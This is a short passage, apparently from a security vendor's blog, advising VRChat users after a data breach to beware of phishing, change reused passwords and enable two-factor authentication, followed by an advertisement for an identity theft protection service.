First and foremost, be cautious of emails, texts, or calls claiming to come from VRChat or the gaming platforms you used it on, as cybercriminals often exploit breaches with phishing scams.

If you’ve used your VRChat password anywhere else, change those accounts immediately, and set up two-factor authentication (2FA) on your VRChat account if you haven’t already.

More general advice can be found in our article on what to do when you find out you’re involved in a data breach.

Let’s face it, an incognito window can only do so much. 
 
Breaches, dark web trading, credit fraud. Malwarebytes Identity Theft Protection monitors for all of it, alerts you fast, and comes with identity theft insurance.